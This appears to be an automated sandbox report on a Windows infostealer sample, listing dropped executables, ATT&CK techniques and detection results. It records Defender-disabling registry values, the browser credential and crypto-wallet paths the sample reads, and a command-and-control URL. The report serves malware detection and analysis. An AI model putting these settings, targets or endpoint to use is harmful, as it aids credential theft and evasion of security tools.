                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe TID: 6116 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe TID: 5544 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe TID: 3952 | Thread sleep count: 2044 > 30
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe TID: 4780 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exe
                            Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Window / User API: threadDelayed 2044
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-2574
                            Source: C:\Users\user\Desktop\file.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2574
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-2575
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00055467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00055467
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00052390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00052390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Code function: 1_2_00022390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00022390
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Code function: 2_2_00102390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00102390
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Code function: 3_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_010E2390
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00052F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00052F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Memory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00056F40 SetUnhandledExceptionFilter,0_2_00056F40
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00056CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00056CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Code function: 1_2_00026F40 SetUnhandledExceptionFilter,1_2_00026F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Code function: 1_2_00026CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00026CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Code function: 2_2_00106F40 SetUnhandledExceptionFilter,2_2_00106F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Code function: 2_2_00106CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00106CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Code function: 3_2_010E6F40 SetUnhandledExceptionFilter,3_2_010E6F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Code function: 3_2_010E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_010E6CF0

                            HIPS / PFW / Operating System Protection Evasion

                            Source: aWM14.exe.3.dr, Program.cs | Reference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: bRz07Kk.exe.3.dr, MemoryImport.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: 4.0.aWM14.exe.f20000.0.unpack, Program.cs | Reference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, MemoryImport.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000518A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_000518A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00057155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00057155
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00052BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00052BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Code function: 4_2_00007FFBACE2077D GetUserNameA,4_2_00007FFBACE2077D

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara match | File source: dump.pcap, type: PCAP
                            Source: Yara match | File source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: bRz07Kk.exe PID: 4812, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPED
                            Source: Yara match | File source: 1.3.gck46uD.exe.497cc20.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 1.3.gck46uD.exe.497cc20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                            Remote Access Functionality

                            Source: Yara match | File source: dump.pcap, type: PCAP
                            Source: Yara match | File source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: bRz07Kk.exe PID: 4812, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPED

                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                            Execution: 221 Windows Management Instrumentation; 12 Native API; 2 Command and Scripting Interpreter; 1 Service Execution; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
                            Persistence: 1 DLL Side-Loading; 1 Windows Service; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                            Privilege Escalation: 1 DLL Side-Loading; 2 Bypass User Access Control; 1 Access Token Manipulation; 1 Windows Service; 1 Process Injection; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                            Defense Evasion: 21 Disable or Modify Tools; 11 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 2 Bypass User Access Control; 1 Masquerading; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 1 Process Injection; 1 Rundll32
                            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                            Discovery: 1 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 127 System Information Discovery; 22 Security Software Discovery; 11 Process Discovery; 231 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Owner/User Discovery; Process Discovery
                            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
                            Collection: 1 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
                            Command and Control: 2 Encrypted Channel; 1 Non-Standard Port; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                            Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

                            [Behavior graph (image not preserved): Behavior Graph ID: 808971, Sample: file.exe, Startdate: 15/02/2023, Architecture: WINDOWS, Score: 100. Process chain: file.exe started gck46uD.exe, which started gDR79xP.exe, which started gOk22TE.exe, which started bRz07Kk.exe and aWM14.exe; bRz07Kk.exe is linked to 193.233.20.13.]

Source | Detection | Scanner | Label | Link
file.exe | 56% | Virustotal | | Browse
file.exe | 100% | Avira | HEUR/AGEN.1252166 |
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | 100% | Avira | HEUR/AGEN.1252166 |
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | 100% | Avira | HEUR/AGEN.1252166 |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | 100% | Avira | HEUR/AGEN.1252166 |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | 100% | Avira | HEUR/AGEN.1252166 |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link | Download
1.0.gck46uD.exe.20000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
2.0.gDR79xP.exe.100000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
2.2.gDR79xP.exe.100000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
0.0.file.exe.50000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
1.2.gck46uD.exe.20000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
3.2.gOk22TE.exe.10e0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
2.3.gDR79xP.exe.4950820.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
6.0.bRz07Kk.exe.1e0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
3.0.gOk22TE.exe.10e0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
0.2.file.exe.50000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
                            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
193.233.20.2/Bn89hku/index.php | true | URL Reputation: safe | low
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                    http://tempuri.org/Entity/Id15bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id16bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/NoncebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id17bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id18bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id5ResponsebRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id19bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsbRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id8ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeybRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id4(bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2006/02/addressingidentitybRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/soap/envelope/bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://search.yahoo.com?fr=crmas_sfpfbRz07Kk.exe, 00000006.00000002.370107810.0000000003810000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000035A4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000290B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000388E000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000287A000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003658000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002760000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000363B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003753000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036D5000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000382D000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003736000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeybRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
